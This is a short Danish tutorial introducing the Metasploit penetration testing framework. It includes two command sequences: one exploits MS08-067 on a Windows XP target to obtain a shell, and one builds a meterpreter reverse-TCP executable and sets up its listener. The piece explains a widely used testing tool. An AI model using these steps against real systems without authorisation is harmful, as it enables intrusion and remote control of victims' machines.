Metasploit Framework er et open source penetration værktøj som blev udviklet i 2003 af HD Moore , der anvendes til at udvikle og gennemføre exploit-kode mod en target maskine, Metasploit Framework har verdens største database over offentlige, testede exploits. Metasploit kan anvendes til at teste sårbarheder io computersystemer med henblik på at beskytte dem og på den anden side kan det også anvendes til at bryde ind i eksterne systemer. Metasploit er at finde på de mest udbredte penetrations tests software, så som kalilinux, blackbox og blackarch linux og startes næsten oftes fra en terminal med kommandoen, service metasploit start og herefter startes matesploit framework med kommandoen msfconsole.

Hack en XP enhed kunne se således ud.

Metasploit

  1. msfconsole
  2. search netapi
  3. use exploit/windows/smb/ms08_067_netapi
  4. set RHOST “DEN IP DU GÅR EFTER”
  5. set LHOST “DIN IP”
  6. exploit
  7. shell

 

Et payload angreb kunne se således ud.
  1. Terminal 1
  2. msfpayload windows/meterpreter/reverse_tcp LHOST=“din ip” LPORT=8080 x > /root/Desktop/“navn du nu vil lave”.exe
  3. Terminal 2
  4. msfconsole
  5. use multi/handler
  6. set LHOST “din ip”
  7. set LPORT 8080
  8. exploit

 

En rigtig god pdf at læse er – Metasploit – The Penetration Testers Guide